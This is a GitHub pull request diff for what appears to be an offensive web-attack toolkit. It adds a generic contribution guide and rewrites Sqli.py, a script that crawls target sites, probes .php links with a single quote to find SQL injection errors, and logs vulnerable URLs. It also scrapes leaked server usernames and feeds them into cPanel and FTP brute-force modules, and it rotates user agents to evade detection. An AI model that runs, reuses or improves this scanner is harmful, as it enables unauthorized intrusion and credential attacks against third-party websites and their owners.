Skip to content

Update Sqli.py and cms.py.Added CONTRIBUTING.md #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 3 commits into
base: main
Choose a base branch
from
Open

Update Sqli.py and cms.py.Added CONTRIBUTING.md #1

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
baf7c18
Update Sqli.py and cms.py.Added CONTRIBUTING.md
fuysaal Apr 7, 2025
b5d0a22
Update CONTRIBUTING.md
fuysaal Apr 7, 2025
d485726
Sqli.py and cms.py were updated. CONTRIBUTING.md was added and updated
fuysaal Apr 7, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
40 changes: 40 additions & 0 deletions CONTRIBUTING.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
Contribution Guide

Thank you for wanting to contribute to the project! Below are the steps you can follow to make a contribution.
How Can You Contribute?

Fork the Repository: Fork the project to your own GitHub account.

Create a Branch: Create a new branch for a new feature or bug fix.

git checkout -b new-feature

Make Changes: Make the necessary changes in your branch.

Commit Changes: Commit your changes.

git commit -am 'Added new feature'

Push Changes: Push your changes to the forked repository.

git push origin new-feature

Create a Pull Request: Create a pull request to the original repository.

Coding Standards

Ensure your code is clear and readable.

Follow the coding standards established for the project.

Write relevant tests and make sure your changes pass the existing tests.

PR and Issue Guidelines

Provide detailed information about the changes you made in the PR description.

When reporting issues, give as much detail as possible.

Use appropriate labels and references.

Thank you and have a great day at work!
133 changes: 82 additions & 51 deletions tools/Sqli.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,85 +1,116 @@
import requests, re
import random
from core import printmodels
from tools import cpanel
from BruteForce import FTPBruteForce
from time import sleep


user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0',
'Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
]

def get_random_user_agent():
return random.choice(user_agents)

def Exploit(site):

agent = {'User-Agent': get_random_user_agent()}


if site.startswith("http://"):
site = site.replace("http://", "")
elif site.startswith("https://"):
site = site.replace("https://", "")
else:
pass
agent = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
}

try:
GetLink = requests.get('http://' + site, timeout=10, headers=agent)

GetLink = requests.get(f'http://{site}', timeout=10, headers=agent)
urls = re.findall(r'href=[\'"]?([^\'" >]+)', str(GetLink.content))


if len(urls) != 0:
return CheckSqliURL(site, urls)
return CheckSqliURL(site, urls, agent)
else:
pass
except:
pass

return None
except requests.exceptions.Timeout as e:
print(f"Timeout error for site {site}: {e}")
sleep(5) # Birkaç saniye bekle ve tekrar dene
return Exploit(site) # Tekrar deneyelim
except requests.exceptions.ConnectionError as e:
print(f"Connection error for site {site}: {e}")
return None
except requests.exceptions.HTTPError as e:
print(f"HTTP error for site {site}: {e}")
return None
except requests.exceptions.RequestException as e:
print(f"Request error for site {site}: {e}")
return None
except Exception as e:
print(f"An unexpected error occurred: {e}")
return None

def CheckSqliURL(site, urls):
def CheckSqliURL(site, urls, agent):
MaybeSqli = []
for url in urls:
try:
if '.php?' in str(url):
MaybeSqli.append(site + '/' + url)
except:
except Exception as e:
print(f"Error processing URL {url}: {e}")
pass

if len(MaybeSqli) != 0:
return CheckSqli(MaybeSqli, site)
return CheckSqli(MaybeSqli, site, agent)
else:
return printmodels.returnNo(site, 'N/A', 'Sql Injection', 'unknown')


def CheckSqli(MaybeSqli, site):
def CheckSqli(MaybeSqli, site, agent):
for url in MaybeSqli:
try:
error = ["DB Error", "SQL syntax;", "mysql_fetch_assoc", "mysql_fetch_array", "mysql_num_rows",
"is_writable",
"mysql_result", "pg_exec", "mysql_result", "mysql_num_rows", "mysql_query", "pg_query",
"System Error",
"io_error", "privilege_not_granted", "getimagesize", "preg_match", "mysqli_result", 'mysqli']

error = ["DB Error", "SQL syntax;", "mysql_fetch_assoc", "mysql_fetch_array", "mysql_num_rows",
"is_writable", "mysql_result", "pg_exec", "mysql_result", "mysql_num_rows", "mysql_query", "pg_query",
"System Error", "io_error", "privilege_not_granted", "getimagesize", "preg_match", "mysqli_result", 'mysqli']


if url.startswith("http://"):
url = url.replace("http://", "")
elif url.startswith("https://"):
url = url.replace("https://", "")
else:
pass
agent = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
}

for s in error:
Checksqli = requests.get('http://' + url + "'", timeout=5, headers=agent)
if s in str(Checksqli.content):
SQLI = url.replace("'", "")
if SQLI.startswith("http://"):
SQLI = SQLI.replace("http://", "")
elif SQLI.startswith("https://"):
SQLI = SQLI.replace("https://", "")
else:
pass
if 'http://' in SQLI:
pass
else:
with open('result/SqlInjection_targets.txt', 'a') as xx:
xx.write('http://' + SQLI + '\n')
try:
Username = re.findall('/home/(.*)/public_html/', str(Checksqli.content))[0]
cpanel.Check(site, Username, 'Cpanel')
FTPBruteForce.CheckFTPport(site, Username)
except:
pass
return printmodels.returnYes(SQLI, 'N/A', 'Sql Injection', 'unknown')
else:
try:
Checksqli = requests.get(f'http://{url}\'', timeout=5, headers=agent)

if s in str(Checksqli.content):
SQLI = url.replace("'", "")
if 'http://' not in SQLI:
with open('result/SqlInjection_targets.txt', 'a') as xx:
xx.write(f'http://{SQLI}\n')
try:
Username = re.findall('/home/(.*)/public_html/', str(Checksqli.content))[0]
cpanel.Check(site, Username, 'Cpanel')
FTPBruteForce.CheckFTPport(site, Username)
except Exception as e:
print(f"Error checking FTP or cPanel for {SQLI}: {e}")
return printmodels.returnYes(SQLI, 'N/A', 'Sql Injection', 'unknown')
except requests.exceptions.Timeout as e:
print(f"Timeout error for URL {url}: {e}")
sleep(3)
pass
except requests.exceptions.ConnectionError as e:
print(f"Connection error for URL {url}: {e}")
pass
except requests.exceptions.RequestException as e:
print(f"Request failed for URL {url}: {e}")
pass
except Exception as e:
print(f"Unexpected error for URL {url}: {e}")
pass
break
except:
except Exception as e:
print(f"Error processing URL {url}: {e}")
pass
Loading